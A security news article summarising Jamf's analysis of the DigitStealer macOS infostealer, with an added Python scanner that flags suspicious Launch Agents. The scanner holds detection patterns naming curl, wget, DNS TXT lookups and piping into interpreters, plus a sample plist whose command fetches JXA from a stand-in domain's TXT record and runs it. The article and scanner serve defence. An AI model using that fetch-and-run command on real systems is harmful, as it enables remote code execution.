Jamf Threat Labs has uncovered a new macOS infostealer—named DigitStealer—that demonstrates an unusually high degree of sophistication, stealth, and platform awareness. The malware uses advanced hardware-based execution gates, multi-stage payload delivery, Cloudflare Pages hosting, JXA (JavaScript for Automation), and even tampering with cryptocurrency wallet software such as Ledger Live.
According to Jamf’s researchers, “DigitStealer… leverages advanced hardware checks and multi-stage attacks to evade detection and steal sensitive data.”
The newly discovered sample was found packaged as an unsigned disk image named DynamicLake.dmg, spoofing the legitimate macOS utility. Jamf researchers note that:
“The disk image appears to masquerade as the legitimate DynamicLake macOS utility… Instead, the fake version is distributed via the domain dynamiclake[.]org.”
Most alarming, the malware was fully undetected on VirusTotal at the time of analysis.

DigitStealer begins with a seemingly simple drag-to-terminal installation script, which fetches the first payload via a one-line command:
Once decoded, the dropper reveals unusually extensive anti-analysis features, including locale restrictions, VM detection, and hardware-specific sysctl checks:
“One notable addition is a locale check… to determine the system’s country setting and exit if it matches certain predefined values.”
“The script introduces a new set of anti-analysis checks targeting Apple Silicon systems… to determine whether the target system is running on an Apple Silicon M2 chip or newer.”
In practice, the malware refuses to execute on VMs, Intel Macs, and—intentionally or not—Apple M1 machines, focusing instead on M2 or later models.
The first major payload is surprisingly straightforward: an AppleScript that prompts the victim for their macOS password and immediately begins credential harvesting.
Key actions include:
- Stealing and exfiltrating credentials and files via the attacker’s domain
- Collecting and zipping Desktop, Documents, Downloads, and Notes
- Resetting macOS TCC permissions to weaken privacy controls
- Modifying the Ledger Live cryptocurrency wallet application
The analysis notes:
“The AppleScript retrieved by the stealer modifies Ledger Live differently than many previous campaigns… downloading three separate parts and concatenating them.”
This multi-part assembly tactic is designed to evade single-file detection by security tools.
A second, more complex JavaScript for Automation (JXA) payload is delivered to harvest:
- Browser data (Chrome, Brave, Edge, Firefox)
- Cryptocurrency wallets (Ledger, Electrum, Exodus, Coinomi)
- macOS Keychain
- VPN configurations
- Telegram data
According to Jamf:
“It’s interesting to see this functionality split out into a separate stage, likely as an attempt to reduce detection by breaking up indicators across multiple payloads.”
The third payload zeroes in on users of Ledger Live, modifying the application configuration to redirect sensitive data:
“The script does the following: points Ledger Live to an attacker-controlled endpoint… replaces or modifies the data.endpoint object with attacker-supplied values.”
This enables the attackers to exfiltrate seed phrases or inject malicious wallet configurations—an extremely high-value target.
The final stage establishes persistence through a Launch Agent that dynamically retrieves its payload from a DNS TXT record:
“This method of fetching a value from a TXT record… is not something we have previously observed in macOS infostealers.”
The downloaded JXA script acts as a long-running backdoor, polling the C2 server every 10 seconds for new AppleScript or JavaScript commands.
Jamf notes:
“This final payload functions as a persistent JXA agent that continuously polls the attacker’s command and control server… sending the system’s hardware UUID, hashed with MD5.”
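A defender-side check for the persistence technique described above, added here as an example and not code from Jamf or from the malware: it parses Launch Agent plists and flags any agent whose command line both reaches out (a DNS TXT lookup or HTTP fetch) and hands the result to an interpreter such as osascript in JXA mode. The regex patterns, the sample plists and the payload.example.invalid domain are constructed assumptions; the write-up does not give DigitStealer's exact invocation.

```python
import plistlib
import re
from pathlib import Path

# Constructed heuristics for the behaviours Jamf describes: JXA execution and a
# Launch Agent that pulls its payload from a DNS TXT record. The exact command
# strings DigitStealer uses are not in the write-up; these patterns are assumptions.
SUSPICIOUS_PATTERNS = {
    "jxa_interpreter": re.compile(r"\bosascript\b.*-l\s*JavaScript", re.I),
    "dns_txt_lookup": re.compile(r"\b(dig|nslookup|host)\b.*\btxt\b", re.I),
    "pipe_to_interpreter": re.compile(r"\|\s*(osascript|sh|bash|zsh|python3?)\b", re.I),
    "remote_fetch": re.compile(r"\b(curl|wget)\b.*https?://", re.I),
}

def launch_agent_findings(plist_bytes: bytes) -> dict:
    """Parse one Launch Agent plist and record which heuristics its command line trips."""
    data = plistlib.loads(plist_bytes)
    args = data.get("ProgramArguments") or [data.get("Program", "")]
    cmdline = " ".join(str(a) for a in args)
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmdline)]
    return {"label": data.get("Label", "<no label>"), "cmdline": cmdline, "hits": hits}

def is_suspicious(finding: dict) -> bool:
    """Flag agents that both fetch something remotely and hand it to an interpreter."""
    hits = set(finding["hits"])
    reaches_out = bool(hits & {"dns_txt_lookup", "remote_fetch"})
    executes = bool(hits & {"jxa_interpreter", "pipe_to_interpreter"})
    return reaches_out and executes

def scan_launch_agents(directories) -> list:
    """Return suspicious findings for every .plist under the given directories."""
    results = []
    for d in directories:
        for p in Path(d).expanduser().glob("*.plist"):
            try:
                finding = launch_agent_findings(p.read_bytes())
            except Exception:  # unreadable or non-plist file: skip it, keep sweeping
                continue
            if is_suspicious(finding):
                results.append({"path": str(p), **finding})
    return results

# Constructed samples: a benign agent, and one modelled on the described persistence.
SAMPLE_BENIGN = plistlib.dumps({"Label": "com.example.backup", "RunAtLoad": True,
    "ProgramArguments": ["/usr/bin/python3", "/Users/me/backup.py", "--nightly"]})
SAMPLE_SUSPICIOUS = plistlib.dumps({"Label": "com.example.updater", "RunAtLoad": True,
    "ProgramArguments": ["/bin/sh", "-c",
        'osascript -l JavaScript -e "$(dig +short TXT payload.example.invalid)"']})

if __name__ == "__main__":
    for sample in (SAMPLE_BENIGN, SAMPLE_SUSPICIOUS):
        print(launch_agent_findings(sample), is_suspicious(launch_agent_findings(sample)))
    print(scan_launch_agents(["~/Library/LaunchAgents", "/Library/LaunchAgents"]))
```

Run it on a host to sweep the user and system Launch Agent folders; a hit is a lead to inspect, not proof of compromise, since legitimate updaters also fetch and execute.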
The DigitStealer campaign demonstrates a significant escalation in macOS threat development:
“This latest variant… shows a growing level of sophistication in how threats are built for macOS.”
Its multilayered delivery, hardware-aware targeting, and use of legitimate hosting platforms such as Cloudflare Pages place it among the most advanced infostealers observed this year.
Jamf concludes with a warning:
“It serves as another reminder that malware authors are abusing legitimate services and distribution methods to bypass macOS security controls.”